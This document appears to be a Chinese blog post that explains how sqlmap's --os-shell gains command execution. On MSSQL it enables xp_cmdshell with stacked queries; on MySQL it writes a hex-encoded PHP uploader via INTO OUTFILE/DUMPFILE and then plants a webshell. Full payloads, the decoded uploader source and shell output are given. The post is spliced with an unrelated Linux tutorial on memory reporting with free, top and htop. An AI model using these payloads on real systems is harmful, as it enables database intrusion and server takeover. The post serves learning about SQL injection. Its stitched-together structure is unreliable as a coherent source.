Mssql


mssql想要执行命令需要支持Stacked Queries。使用mssql 2005测试。
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure开启它。
使用sqlmap -v 3来查看sqlmap的Payload

[16:13:05] [PAYLOAD] 1;DECLARE @hihq VARCHAR(8000);SET @hihq=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @hihq--
0x70696e67202d6e203130203132372e302e302e31

转换为字符串为ping -n 10 127.0.0.1
通过响应时间来判断是否可以执行命令

xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n]
[16:16:26] [PAYLOAD] 1;EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE--

通过EXEC master..sp_configure ‘xp_cmdshell’,1; RECONFIGURE WITH OVERRIDE; 启用xp_cmdshell

[16:19:59] [INFO] xp_cmdshell re-enabled successfully

然后创建一张表来写入命令执行的输出

[16:19:59] [PAYLOAD] 1;DROP TABLE sqlmapoutput--
[16:19:59] [PAYLOAD] 1;CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[16:19:59] [PAYLOAD] 1;DECLARE @iqoj VARCHAR(8000);SET @iqoj=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @iqoj--
0x6563686f2031为echo 1
[16:19:59] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113) FROM sqlmapoutput ORDER BY id-- -
[16:19:59] [PAYLOAD] 1;DELETE FROM sqlmapoutput--

os-shell> whoami
[16:24:38] [PAYLOAD] 1;DECLARE @xgsv VARCHAR(8000);SET @xgsv=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @xgsv--
[16:24:38] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113) FROM sqlmapoutput ORDER BY id-- -
[16:24:38] [DEBUG] performed 1 queries in 0.04 seconds
[16:24:38] [PAYLOAD] 1;DELETE FROM sqlmapoutput--
command standard output: 'nt authority\system'

 

Mysql


python sqlmap.py -r r.txt --os-shell
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

直接回车选择默认PHP

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /v
ar/www/nginx-default') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

1为默认apache的默认Web路径,可以通过报错信息获取到Web程序的绝对路径,选择2输入
please provide a comma separate list of absolute directory paths: /var/www/html/
先看一下sqlmap的打印信息

[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT
'LINES TERMINATED BY' method
[10:25:02] [WARNING] unable to upload the file stager on '/var/www/html/'
[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via UNION
method
[10:25:02] [INFO] the remote file '/var/www/html/tmpuhgbs.php' is larger (706 B)
than the local file 'c:\users\dell\appdata\local\temp\sqlmappmmrsn14284\tmpdctw
k9' (705B)
[10:25:02] [INFO] the file stager has been successfully uploaded on '/var/www/ht
ml/' - http://192.168.192.120:80/tmpuhgbs.php
[10:25:02] [INFO] the backdoor has been successfully uploaded on '/var/www/html/
' - http://192.168.192.120:80/tmpbewox.php
[10:25:02] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

然后对应着Mysql的查询日志来看一下:

[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT
'LINES TERMINATED BY' method
[10:25:02] [WARNING] unable to upload the file stager on '/var/www/html/'

通过LINES TERMINATED BY的方法来写入PHP文件

SELECT first_name, last_name FROM users WHERE user_id = '' LIMIT 0,1 INTO OUTFILE '/var/www/html/tmpuscdb.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a

LINES TERMINATED BY表示查询记录的每行以By后面的内容分割,这里因为查询user_id为空所以没有查询到记录,所以此文件为空。如果将id的参数修改为1,则有一条查询内容,那么这段PHP文件上传程序就可以成功写入文件。

然后通过into outfile的方式来写入文件

SELECT first_name, last_name FROM users WHERE user_id = '-1181' UNION ALL SELECT 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a,NULL INTO DUMPFILE '/var/www/html/tmpuhgbs.php'-- -'

这段16进制的内容为:

<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/> <input type=submit name=upload value=upload></form>";}?>

是一段文件上传的代码
然后判断文件上传是否成功

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL SELECT CONCAT(0x71786a6b71,IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f746d7075686762732e706870)) AS CHAR),0x20),0x7178767871),NULL-- -'

文件上传成功,可以看到属主和属组都是mysql。
-rw-rw-rw- 1 mysql mysql 706 6月 17 10:21 tmpuhgbs.php
然后通过tmpuhgbs.php直接上传webshell,可以看到权限为apache。
-rwxr-xr-x 1 apache apache 908 6月 17 10:21 tmpbewox.php
然后就可以执行系统命令了

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'apache'

PS:有时因为中途退出会导致命令执行没有回显
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] No output
需要清空一下C:\USERS\XXX\.SQLMAP\OUTPUT\

0x01 Free


[root@template tmp]# free -m

             total       used       free     shared    buffers     cached

Mem:         15724        840      14883          0        213        214

-/+ buffers/cache:        412      15311

Swap:         4999          0       4999

这里先说一下buffer与cache

buffers 就是存放要输出到disk(块设备)的数据,缓冲满了一次写,提高io性能(内存 -> 磁盘)

cached 就是存放从disk上读出的数据,常用的缓存起来,减少io(磁盘 -> 内存)

 

然后我们看一下每个值具体的含义:

Mem

Mem:表示物理内存统计

-/+ buffers/cached:表示物理内存的缓存统计

Swap:表示硬盘上交换分区的使用情况

 

系统的总物理内存:15724M,注意第一行的Free并非是真正可用的内存。我们来看下每个值具体的含义

total1:表示物理内存总量

used1:表示总计分配给缓存(包含buffers 与cache )使用的数量,但其中可能部分缓存并未实际使用

free1:未被分配的内存

shared1:共享内存

buffers1:系统分配但未被使用的buffers 数量

cached1:系统分配但未被使用的cache 数量

 

-/+buffers/cache

used2:实际使用的buffers 与cache 总量,也是实际使用的内存总量。

free2:未被使用的buffers 与cache 和未被分配的内存之和,这就是系统当前实际可用内存。

 

具体计算方式如下:

total1 = used1 + free1

total1 = used2 + free2

used1 = buffers1 + cached1 + used2

free2 = buffers1 + cached1 + free1

 

0x02 Top


[root@template tmp]# free -k        

             total       used       free     shared    buffers     cached

Mem:      16101816    1029264   15072552          0     220152     386804

-/+ buffers/cache:     422308   15679508

Swap:      5119992          0    5119992

[root@template tmp]#  top | head -n 5

top - 14:48:29 up 23:53,  3 users,  load average: 0.00, 0.01, 0.00

Tasks: 142 total,   1 running, 141 sleeping,   0 stopped,   0 zombie

Cpu(s):  0.2%us,  0.1%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

Mem:  16101816k total,  1029388k used, 15072428k free,   220128k buffers

Swap:  5119992k total,        0k used,  5119992k free,   386800k cached

显示的值实际与我们使用Free第一行显示的数据几乎一致,但是top无法给出free 第二行的 -/+ buffers/cache 数据。所以top命令不能完全反映出物理内存的实际使用量,推荐用free查看物理内存的实际使用量。

 

0x03 Htop


查看内存显示的实际内存用量,与used2一致。

[root@template tmp]# yum install htop

[root@template tmp]# free -m

             total       used       free     shared    buffers     cached

Mem:         15724       1005      14719          0        214        377

-/+ buffers/cache:        412      15312

Swap:         4999          0       4999